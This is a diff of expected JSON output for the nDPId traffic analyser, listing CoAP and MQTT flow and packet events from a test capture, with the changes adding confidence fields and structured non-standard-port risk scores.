+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1375090528017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":81,"pkt_l4_len":27,"ts_msec":1375090528017,"pkt":"uCfrprIvACTop0mhht1gAAAAABsRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADgtsWMwAblIJCAekbB5C4c2VwYXJhdGUQ0SMR"}
-00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1375090528127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"ts_msec":1375090528127,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wAMpjBgAOkb"}
 00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1375090529153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":191,"pkt_l4_len":137,"ts_msec":1375090529153,"pkt":"ACTop0mhuCfrprIvht1gAAAAAIkRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wCJMIhCRVcPB5D\/VGhpcyBtZXNzYWdlIHdhcyBzZW50IGJ5IGEgc2VwYXJhdGUgcmVzcG9uc2UuCllvdXIgY2xpZW50IHdpbGwgbmVlZCB0byBhY2tub3dsZWRnZSBpdCwgb3RoZXJ3aXNlIGl0IHdpbGwgYmUgcmV0cmFuc21pdHRlZC4="}
-00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1375090926676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1375090926676,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwAfdD1AAs6gt3N0b3JhZ2X\/bXlyZXNvdXJjZQ=="}
-00587{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1375090926735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1375090926735,"pkt":"ACTop0mhuCfrprIvht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjPESgAfeP9gQc6gh3N0b3JhZ2UKbXlyZXNvdXJjZQ=="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1375090935026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":73,"pkt_l4_len":19,"ts_msec":1375090935026,"pkt":"uCfrprIvACTop0mhht1gAAAAABMRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwATY+NAA86h\/215ZGF0YQ=="}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1375090935240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1375090935240,"pkt":"uCfrprIvACTop0mhht1gAAAAACYRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAmaNlAA5Uit3N0b3JhZ2UKbXlyZXNvdXJjZf9teWRhdGE="}
-00587{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1375090935293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"ts_msec":1375090935293,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjO24wAMxd1gRJUi"}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="}
-00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1375091022221,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1455907243976,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1455907243976,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":18,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1375091022221,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1455907243976,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1455907243976,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"}
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
